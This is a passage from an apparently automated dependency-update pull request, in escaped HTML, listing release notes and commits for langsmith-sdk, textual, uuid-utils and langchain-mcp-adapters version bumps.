href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3006\"\u003elangchain-ai/langsmith-sdk#3006\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: protect JS openapi client in workflow by \u003ca href=\"https://github.com/KiewanVillatel\"\u003e\u003ccode\u003e@​KiewanVillatel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3017\"\u003elangchain-ai/langsmith-sdk#3017\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(js): deliver sandbox output callbacks across stream reconnects by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3022\"\u003elangchain-ai/langsmith-sdk#3022\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(python): deliver sandbox output callbacks across stream reconnects by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3023\"\u003elangchain-ai/langsmith-sdk#3023\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: bump JS to 0.7.7 and Python to 0.8.15 by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3025\"\u003elangchain-ai/langsmith-sdk#3025\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.14...v0.8.15\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.14...v0.8.15\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.14\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat: add deepagent compatibility smoke tests to Python and JS CI [LSDK-214] by \u003ca href=\"https://github.com/QuentinBrosse\"\u003e\u003ccode\u003e@​QuentinBrosse\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2997\"\u003elangchain-ai/langsmith-sdk#2997\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(py): bump Python SDK to 0.8.14 by \u003ca href=\"https://github.com/vishnu-ssuresh\"\u003e\u003ccode\u003e@​vishnu-ssuresh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3013\"\u003elangchain-ai/langsmith-sdk#3013\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.13...v0.8.14\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.13...v0.8.14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.13\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(py): type sandbox startup errors by \u003ca href=\"https://github.com/vishnu-ssuresh\"\u003e\u003ccode\u003e@​vishnu-ssuresh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3004\"\u003elangchain-ai/langsmith-sdk#3004\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(py): bump Python SDK to 0.8.13 by \u003ca href=\"https://github.com/vishnu-ssuresh\"\u003e\u003ccode\u003e@​vishnu-ssuresh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3012\"\u003elangchain-ai/langsmith-sdk#3012\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.12...v0.8.13\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.12...v0.8.13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.12\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eci: protect _openapi_client from unauthorized changes by \u003ca href=\"https://github.com/KiewanVillatel\"\u003e\u003ccode\u003e@​KiewanVillatel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2999\"\u003elangchain-ai/langsmith-sdk#2999\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: gemini double counting of over 200k tokens by \u003ca href=\"https://github.com/dqbd\"\u003e\u003ccode\u003e@​dqbd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3003\"\u003elangchain-ai/langsmith-sdk#3003\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(python): cross-process OAuth refresh filesystem lock by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2988\"\u003elangchain-ai/langsmith-sdk#2988\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(js): cross-process OAuth refresh filesystem lock by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2989\"\u003elangchain-ai/langsmith-sdk#2989\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: avoid duplicate /v1 in hub URLs when endpoint includes /api/v1 by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3008\"\u003elangchain-ai/langsmith-sdk#3008\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: bump JS to 0.7.6 and Python to 0.8.12 by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3011\"\u003elangchain-ai/langsmith-sdk#3011\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.11...v0.8.12\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.11...v0.8.12\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.11\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: match async feedback client to sync behavior [LSEN-206] by \u003ca href=\"https://github.com/vishnu-ssuresh\"\u003e\u003ccode\u003e@​vishnu-ssuresh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3001\"\u003elangchain-ai/langsmith-sdk#3001\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.10...v0.8.11\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.10...v0.8.11\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.10\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat(sandbox): size the dockerfile-build sandbox via vCpus/memBytes (js) by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2980\"\u003elangchain-ai/langsmith-sdk#2980\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/84b7144242e5cc53ce55752cc5be6369ffc1bd9f\"\u003e\u003ccode\u003e84b7144\u003c/code\u003e\u003c/a\u003e chore: bump JS to 0.7.7 and Python to 0.8.15 (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3025\"\u003e#3025\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/909390fb9ac66d15e3630ad6e2bf01ac5c9e1774\"\u003e\u003ccode\u003e909390f\u003c/code\u003e\u003c/a\u003e fix(python): deliver sandbox output callbacks across stream reconnects (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3023\"\u003e#3023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/504f641d0ff0d4dfa6b3fb8ed1617d9bb9754f64\"\u003e\u003ccode\u003e504f641\u003c/code\u003e\u003c/a\u003e fix(js): deliver sandbox output callbacks across stream reconnects (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3022\"\u003e#3022\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/f10fe78b0d1efbab7c76d6d99e0fa6ac48fb285d\"\u003e\u003ccode\u003ef10fe78\u003c/code\u003e\u003c/a\u003e chore: protect JS openapi client in workflow (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3017\"\u003e#3017\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/7423a8aa98b3650fc12e64d156cb1ad958444037\"\u003e\u003ccode\u003e7423a8a\u003c/code\u003e\u003c/a\u003e chore: sync langsmith_api (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3006\"\u003e#3006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/047adc9535e45d06cadf4383c85db058d0790e4a\"\u003e\u003ccode\u003e047adc9\u003c/code\u003e\u003c/a\u003e chore(js): exclude generated _openapi_client from linters and type-checker (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/3ac6bb8a5cde1f079265842f6f82273b0ce9e543\"\u003e\u003ccode\u003e3ac6bb8\u003c/code\u003e\u003c/a\u003e chore(py): bump Python SDK to 0.8.14 (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3013\"\u003e#3013\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/36fe84563405928b73cdb2f28b2be8349c897515\"\u003e\u003ccode\u003e36fe845\u003c/code\u003e\u003c/a\u003e feat: add deepagent compatibility smoke tests to Python and JS CI [LSDK-214] ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/572014cd2cbad1c26e6372614a1a972be9b086c7\"\u003e\u003ccode\u003e572014c\u003c/code\u003e\u003c/a\u003e chore(py): bump Python SDK to 0.8.13 (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3012\"\u003e#3012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/03f3b8c741efcbd595dd39849199b7ffa18b9c03\"\u003e\u003ccode\u003e03f3b8c\u003c/code\u003e\u003c/a\u003e fix(py): type sandbox startup errors (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3004\"\u003e#3004\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.5...v0.8.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `textual` from 8.2.6 to 8.2.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Textualize/textual/releases\"\u003etextual's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eThe more Kitty Release\u003c/h2\u003e\n\u003cp\u003eThis release adds additional support for the Kitty key protocol. Which enables some additional keys on some terminals. Additionally, Textual will report modifier keys as separate key events.\u003c/p\u003e\n\u003cp\u003eAdditionally there are a few more shortcuts to the Text Area.\u003c/p\u003e\n\u003cp\u003eThis release sponsored by Mistral AI. See release notes for detail.\u003c/p\u003e\n\u003ch2\u003e[8.2.7] - 2026-05-19\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for Kitty key protocol \u0026quot;Report all keys as escape codes\u0026quot; which enabled alt+backspace on Warp \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded support for detecting separate modifier keys for terminals that support the Kitty key protocol \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eTEXTUAL_DISABLE_KITTY_KEY\u003c/code\u003e env var to disable Kitty key protocol support (debug aid). \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUndo/redo/copy/cut/paste in TextArea will now work with cmd+ on supported terminals \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIn TextArea, ctrl+u will now delete a newline if the cursor is at the start \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ein TextArea alt+delete is now bound to delete word right \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eText opacity applied to an ansi theme will now set the dim attribute if the opacity is \u0026lt; 50% \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6546\"\u003eTextualize/textual#6546\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Textualize/textual/blob/main/CHANGELOG.md\"\u003etextual's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[8.2.7] - 2026-05-19\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for Kitty key protocol \u0026quot;Report all keys as escape codes\u0026quot; which enabled alt+backspace on Warp \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded support for detecting separate modifier keys for terminals that support the Kitty key protocol \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eTEXTUAL_DISABLE_KITTY_KEY\u003c/code\u003e env var to disable Kitty key protocol support (debug aid). \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUndo/redo/copy/cut/paste in TextArea will now work with cmd+ on supported terminals \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIn TextArea, ctrl+u will now delete a newline if the cursor is at the start \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ein TextArea alt+delete is now bound to delete word right \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eText opacity applied to an ansi theme will now set the dim attribute if the opacity is \u0026lt; 50% \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6546\"\u003eTextualize/textual#6546\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed text opacity with ANSI themes creating RGB colors.  \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6546\"\u003eTextualize/textual#6546\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/182277f69011ba0b9665a9a1b1b0c3e89630e913\"\u003e\u003ccode\u003e182277f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/Textualize/textual/issues/6546\"\u003e#6546\u003c/a\u003e from Textualize/ansi-opacity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/49cbec44ffef26d94ddd42065bcb59a0017acd1a\"\u003e\u003ccode\u003e49cbec4\u003c/code\u003e\u003c/a\u003e bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/b24ef07d422b4ca82d0e65189a0659d032036bf4\"\u003e\u003ccode\u003eb24ef07\u003c/code\u003e\u003c/a\u003e snapshot\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/24e34e48a375ae83c607400809c699d88d423b88\"\u003e\u003ccode\u003e24e34e4\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/0c8bbc7eaa3a83b3e2b8b8a35f3e69ec07682b41\"\u003e\u003ccode\u003e0c8bbc7\u003c/code\u003e\u003c/a\u003e text opacity change\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/3b04f316e72d071e212046a01f6b9f9976c77e5c\"\u003e\u003ccode\u003e3b04f31\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/Textualize/textual/issues/6543\"\u003e#6543\u003c/a\u003e from Textualize/textarea-actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/913f5d28cd4aa423f5d9fb9a967cebffa41646aa\"\u003e\u003ccode\u003e913f5d2\u003c/code\u003e\u003c/a\u003e test fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/1027c41662ec4c6c3e50f658f548ea33cbdf9233\"\u003e\u003ccode\u003e1027c41\u003c/code\u003e\u003c/a\u003e ctrl+f replaced with ctrl+delete\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/01fb6fd73af092fe6e5da03c032d3e9c3fa161f1\"\u003e\u003ccode\u003e01fb6fd\u003c/code\u003e\u003c/a\u003e ctrl+backspace binding\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/54317091b8a57ab19a5512ef8479d1748d0c6de4\"\u003e\u003ccode\u003e5431709\u003c/code\u003e\u003c/a\u003e words\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Textualize/textual/compare/v8.2.6...v8.2.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid-utils` from 0.15.0 to 0.16.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aminalaee/uuid-utils/releases\"\u003euuid-utils's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.16.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eOptimize uuid_utils.compat with \u003ccode\u003efrom_int\u003c/code\u003e by \u003ca href=\"https://github.com/aminalaee\"\u003e\u003ccode\u003e@​aminalaee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/pull/166\"\u003eaminalaee/uuid-utils#166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: return version None for non-RFC UUIDs by \u003ca href=\"https://github.com/aminalaee\"\u003e\u003ccode\u003e@​aminalaee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/pull/163\"\u003eaminalaee/uuid-utils#163\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eValidate \u003ccode\u003enode\u003c/code\u003e argument out of range in constructor by \u003ca href=\"https://github.com/aminalaee\"\u003e\u003ccode\u003e@​aminalaee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/pull/164\"\u003eaminalaee/uuid-utils#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDrop Python3.9 by \u003ca href=\"https://github.com/aminalaee\"\u003e\u003ccode\u003e@​aminalaee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/pull/168\"\u003eaminalaee/uuid-utils#168\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aminalaee/uuid-utils/compare/0.15.0...0.16.0\"\u003ehttps://github.com/aminalaee/uuid-utils/compare/0.15.0...0.16.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/5fbd5e6eec51fe20faa3fc67c1274ed7abd9388d\"\u003e\u003ccode\u003e5fbd5e6\u003c/code\u003e\u003c/a\u003e Version 0.16.0 (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/169\"\u003e#169\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/24438fb3ed80a2e565addedf5cb63e9032319a2c\"\u003e\u003ccode\u003e24438fb\u003c/code\u003e\u003c/a\u003e Drop Python3.9 (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/168\"\u003e#168\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/2bc4813859608bd09cc7335a70174eff5c31f037\"\u003e\u003ccode\u003e2bc4813\u003c/code\u003e\u003c/a\u003e Migrate to Zensical (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/167\"\u003e#167\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/cf0bdf46b63c66faf42d8543bb89976a1da52abf\"\u003e\u003ccode\u003ecf0bdf4\u003c/code\u003e\u003c/a\u003e Switch mypy to ty\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/304700ea6c74d9c60a8e5dff1342893c3b85fb4d\"\u003e\u003ccode\u003e304700e\u003c/code\u003e\u003c/a\u003e chore: minor improvements for consistency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/0aeb1d4f68fec5bf2eb221886f60bdd6325f3a53\"\u003e\u003ccode\u003e0aeb1d4\u003c/code\u003e\u003c/a\u003e Fix benchmark URL in README\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/49ca99d5e386a24729d7b0aa6d1c9c0802b7218d\"\u003e\u003ccode\u003e49ca99d\u003c/code\u003e\u003c/a\u003e Optimize uuid_utils.compat with \u003ccode\u003efrom_int\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/166\"\u003e#166\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/c6b04aaa294b5ce7463a50d84715cf963eac14f6\"\u003e\u003ccode\u003ec6b04aa\u003c/code\u003e\u003c/a\u003e Validate \u003ccode\u003enode\u003c/code\u003e argument out of range in constructor (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/164\"\u003e#164\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/f3faea976cd6b60ff078f23f86ef919b75b319dc\"\u003e\u003ccode\u003ef3faea9\u003c/code\u003e\u003c/a\u003e fix: return version None for non-RFC UUIDs (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/163\"\u003e#163\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aminalaee/uuid-utils/compare/0.15.0...0.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langchain-mcp-adapters` from 0.2.2 to 0.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain-mcp-adapters/releases\"\u003elangchain-mcp-adapters's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain-mcp-adapters==0.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps): bump ncipollo/release-action from 1.20.0 to 1.21.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/441\"\u003elangchain-ai/langchain-mcp-adapters#441\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update dependabot.yml to comply with posture checks by \u003ca href=\"https://github.com/jkennedyvz\"\u003e\u003ccode\u003e@​jkennedyvz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/448\"\u003elangchain-ai/langchain-mcp-adapters#448\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: pin pypa/gh-action-pypi-publish to stable commit SHA by \u003ca href=\"https://github.com/jkennedyvz\"\u003e\u003ccode\u003e@​jkennedyvz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/447\"\u003elangchain-ai/langchain-mcp-adapters#447\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump requests from 2.32.5 to 2.33.0 in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/446\"\u003elangchain-ai/langchain-mcp-adapters#446\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump pypa/gh-action-pypi-publish from 106e0b0b7c337fa67ed433972f777c6357f78598 to ed0c53931b1dc9bd32cbe73a98c7f6766f8a527e by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/449\"\u003elangchain-ai/langchain-mcp-adapters#449\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the minor-and-patch group with 6 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca 